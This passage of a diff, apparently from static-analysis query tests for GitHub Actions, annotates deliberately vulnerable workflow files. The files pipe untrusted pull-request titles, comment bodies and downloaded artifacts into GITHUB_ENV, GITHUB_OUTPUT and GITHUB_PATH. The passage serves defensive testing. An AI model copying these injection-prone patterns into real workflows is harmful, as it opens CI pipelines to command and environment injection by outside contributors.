reflected: description: "Reflected input" - value: ${{ steps.reflector.outputs.reflected }} + value: ${{ steps.reflector.outputs.reflected }} # $ Alert[actions/composite-action-sources] Alert[actions/composite-action-summaries] tainted: description: "Reflected input" - value: ${{ steps.source.outputs.tainted}} + value: ${{ steps.source.outputs.tainted}} # $ Alert[actions/composite-action-sources] runs: using: "composite" @@ -29,23 +29,23 @@ runs: find: 'foo' replace: '' - id: sink - run: echo ${{ steps.replace.outputs.value }} + run: echo ${{ steps.replace.outputs.value }} # $ Alert[actions/composite-action-sinks] shell: bash - name: Vulnerable Set Greeting - run: echo "Hello ${{ inputs.who-to-greet }}." + run: echo "Hello ${{ inputs.who-to-greet }}." # $ Alert[actions/composite-action-sinks] shell: bash - id: reflector run: echo "reflected=$(echo $INPUT_WHO_TO_GREET)" >> $GITHUB_OUTPUT shell: bash env: - INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} # $ Source[actions/composite-action-sources] - id: changed-files uses: tj-actions/changed-files@v40 - - id: source + - id: source # $ Source[actions/composite-action-sources] run: echo "tainted=$(echo $TAINTED)" >> $GITHUB_OUTPUT shell: bash env: - TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} + TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} # $ Source[actions/composite-action-sources] diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml index 01036f71148..73368388c9f 100644 --- a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml @@ -6,11 +6,11 @@ jobs: steps: - id: clob1 env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source run: | # VULNERABLE echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT - echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT # $ Alert - id: clob2 run: | echo ${{ steps.clob1.outputs.OUTPUT_1 }} @@ -32,8 +32,8 @@ jobs: with: run_id: ${{ github.event.workflow_run.id }} name: pr_number - - id: clob1 + - id: clob1 # $ Source run: | # VULNERABLE echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT - echo "OUTPUT_2=$(> $GITHUB_OUTPUT + echo "OUTPUT_2=$(> $GITHUB_OUTPUT # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml index 614de61b0cb..0e57bee8ac9 100644 --- a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml @@ -6,18 +6,18 @@ jobs: steps: - id: clob1 env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source run: | # VULNERABLE echo $BODY - echo "::set-output name=OUTPUT::SAFE" + echo "::set-output name=OUTPUT::SAFE" # $ Alert - id: clob2 env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source run: | # VULNERABLE echo "::set-output name=OUTPUT::SAFE" - echo $BODY + echo $BODY # $ Alert - id: clob3 run: | echo ${{ steps.clob1.outputs.OUTPUT }} @@ -38,25 +38,25 @@ jobs: with: run_id: ${{ github.event.workflow_run.id }} name: pr_number - - id: clob1 + - id: clob1 # $ Source run: | # VULNERABLE PR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | @@ -22,12 +31,3 @@ nodes | .github/workflows/output2.yml:53:14:56:19 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\nls *.txt\n | semmle.label | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\nls *.txt\n | | .github/workflows/output2.yml:58:14:62:48 | # VULNERABLE\nCURRENT_VERSION=$(cat gradle.properties \| sed -n '/^version=/ { s/^version=//;p }')\necho "$CURRENT_VERSION"\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\nCURRENT_VERSION=$(cat gradle.properties \| sed -n '/^version=/ { s/^version=//;p }')\necho "$CURRENT_VERSION"\necho "::set-output name=OUTPUT::SAFE"\n | subpaths -#select -| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | -| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | -| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | -| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | -| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_ENV + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml index e4845a6f2f1..0a19c76c769 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml @@ -12,14 +12,14 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip + - name: Unzip # $ Source[actions/envvar-injection/critical] run: | unzip artifact_name.zip -d foo - name: Env Var Injection run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" cat foo >> "$GITHUB_ENV" - echo "EOF" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml index 67209267b5c..c157d791f39 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml @@ -12,7 +12,7 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip + - name: Unzip # $ Source[actions/envvar-injection/critical] run: | unzip artifact_name.zip -d foo - run: | @@ -20,7 +20,7 @@ jobs: echo 'JSON_RESPONSE<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml index d22f09c03bd..c071d54236d 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml @@ -10,23 +10,23 @@ jobs: - run: echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH - env: - PATHINJ: ${{ github.event.pull_request.title }} - run: echo $(echo "$PATHINJ") >> $GITHUB_PATH + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo $(echo "$PATHINJ") >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] - env: - PATHINJ: ${{ github.event.pull_request.title }} - run: echo $PATHINJ >> $GITHUB_PATH + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo $PATHINJ >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] - env: - PATHINJ: ${{ github.event.pull_request.title }} - run: echo ${PATHINJ} >> $GITHUB_PATH + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo ${PATHINJ} >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] - uses: dawidd6/action-download-artifact@v2 with: name: artifact_name path: foo - - run: echo "$(cat foo/bar)" >> $GITHUB_PATH + - run: echo "$(cat foo/bar)" >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] Source[actions/envpath-injection/critical] - env: ACTIONS_ALLOW_UNSECURE_COMMANDS: true - PATHINJ: ${{ github.event.pull_request.title }} - run: echo "::add-path::$PATHINJ" + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo "::add-path::$PATHINJ" # $ Alert[actions/envpath-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml index f43a12cb42a..0811e61cfc6 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml @@ -23,6 +23,6 @@ jobs: ref: ${{steps.decide-ref.outputs.ref}} path: "foo" - - name: Read Java Config - run: cat foo/.github/java-config.env >> $GITHUB_ENV + - name: Read Java Config # $ Source[actions/envvar-injection/critical] + run: cat foo/.github/java-config.env >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml index 5edd526d820..58e0f2edf9c 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml @@ -18,11 +18,11 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: runtime-versions.md - - name: "Put runtime versions on the environment" + - name: "Put runtime versions on the environment" # $ Source[actions/envvar-injection/critical] id: runtime_versions run: | { echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml index 3a0c4cc91b8..097e3a09a11 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml @@ -43,14 +43,14 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: runtime-versions.md - - name: "Put runtime versions on the environment" + - name: "Put runtime versions on the environment" # $ Source[actions/envvar-injection/critical] id: runtime_versions run: | { echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - name: "Download pre-release report" uses: dawidd6/action-download-artifact@v2 @@ -58,14 +58,14 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: prerelease-report.md - - name: "Put pre-release report on the environment" + - name: "Put pre-release report on the environment" # $ Source[actions/envvar-injection/critical] id: prerelease_report run: | { echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - name: "Comment on PR with Wrangler link" uses: marocchino/sticky-pull-request-comment@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml index 78d288fb982..278cea70f19 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml @@ -17,7 +17,7 @@ jobs: - name: Get commit message run: | COMMIT_MESSAGE=$(git log --format=%s) - echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - name: Get commit message run: | - echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV + echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml index 93854c5e889..5b9bd4e278c 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml @@ -12,7 +12,7 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "${{ env.CHANGED-FILES }}" test2: runs-on: ubuntu-latest @@ -23,7 +23,7 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "${{ env.CHANGED-FILES }}" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml index 89ecd8c0ec3..85d6109cd49 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml @@ -9,7 +9,7 @@ jobs: steps: - id: title run: | - echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "$TITLE" test2: runs-on: ubuntu-latest @@ -17,7 +17,7 @@ jobs: - id: title run: | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH}) - echo "BODY=$PR_BODY" >> "$GITHUB_ENV" + echo "BODY=$PR_BODY" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "$TITLE" test3: runs-on: ubuntu-latest diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml index efcfda0e4c7..87a02ca5a1d 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml @@ -12,12 +12,12 @@ jobs: with: workflow: ${{ github.event.workflow_run.workflow_id }} name: pr_metadata + - run: | # $ Source[actions/envvar-injection/critical] + # VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - run: | # VULNERABLE - echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV - - run: | - # VULNERABLE - echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV + echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - run: | # NOT VULNERABLE echo "PR_NUMBER=$(cat pr_number.txt | tr '\n' ' ')" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml index c902b7e61bd..de66e4cf253 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml @@ -38,6 +38,6 @@ jobs: }); var fs = require('fs'); fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); - - run: | + - run: | # $ Source[actions/envvar-injection/critical] unzip pr.zip - echo "pr_number=$(cat NR)" >> $GITHUB_ENV + echo "pr_number=$(cat NR)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml index f76454c6088..5059ee9d0da 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml @@ -17,7 +17,7 @@ jobs: workflow_conclusion: '' name: pr_metadata if_no_artifact_found: 'ignore' - - run: | + - run: | # $ Source[actions/envvar-injection/critical] echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV - echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV + echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 7b30ec8b7e4..f4c6ebcb5b3 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -8,43 +8,43 @@ jobs: runs-on: ubuntu-latest steps: - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | - echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | - echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV + echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | - echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV + echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | echo "PR_TITLE<> $GITHUB_ENV echo "$TITLE" >> $GITHUB_ENV - echo "EOF" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" echo "$TITLE" >> "${GITHUB_ENV}" - echo "EOF" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | cat <<-EOF >> "$GITHUB_ENV" FOO=$TITLE - EOF + EOF # $ Alert[actions/envvar-injection/critical] - env: TITLE: ${{ github.event.pull_request.head.ref }} run: | @@ -52,12 +52,12 @@ jobs: - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV env: TARGET_BRANCH: ${{ github.head_ref }} - - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] env: - TARGET_BRANCH: ${{ github.event.pull_request.title }} - - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV + TARGET_BRANCH: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] - env: TITLE: |- ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml index cfc5e6ef1fa..cdcc49bde91 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml @@ -27,10 +27,10 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' + - name: 'Unzip code coverage' # $ Source[actions/envvar-injection/critical] run: unzip oc-code-coverage.zip -d coverage - name: set env vars run: | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV echo "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml index 36340258515..076941d4aec 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml @@ -8,20 +8,20 @@ jobs: runs-on: ubuntu-latest steps: - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | FOO=${TITLE##*/} - echo PR_TITLE=${FOO} >> $GITHUB_ENV + echo PR_TITLE=${FOO} >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | FOO=$TITLE+ - echo PR_TITLE=$FOO >> $GITHUB_ENV + echo PR_TITLE=$FOO >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | venv="$(echo $TITLE)')" - echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV + echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml index c33c90dbb9c..f9e0ea8a324 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml @@ -13,7 +13,7 @@ jobs: run_id: ${{github.event.workflow_run.id}} name: artifact - - name: Load .env file + - name: Load .env file # $ Source[actions/envvar-injection/critical] uses: aarcangeli/load-dotenv@v1.0.0 with: path: 'backend/new' @@ -21,5 +21,5 @@ jobs: .env .env.test quiet: false - if-file-not-found: error + if-file-not-found: error # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml index 806f8dc8e45..c84dcae914c 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -27,13 +27,13 @@ jobs: run_id: ${{ github.event.workflow_run.id }} path: ./artifacts - - name: assignment + - name: assignment # $ 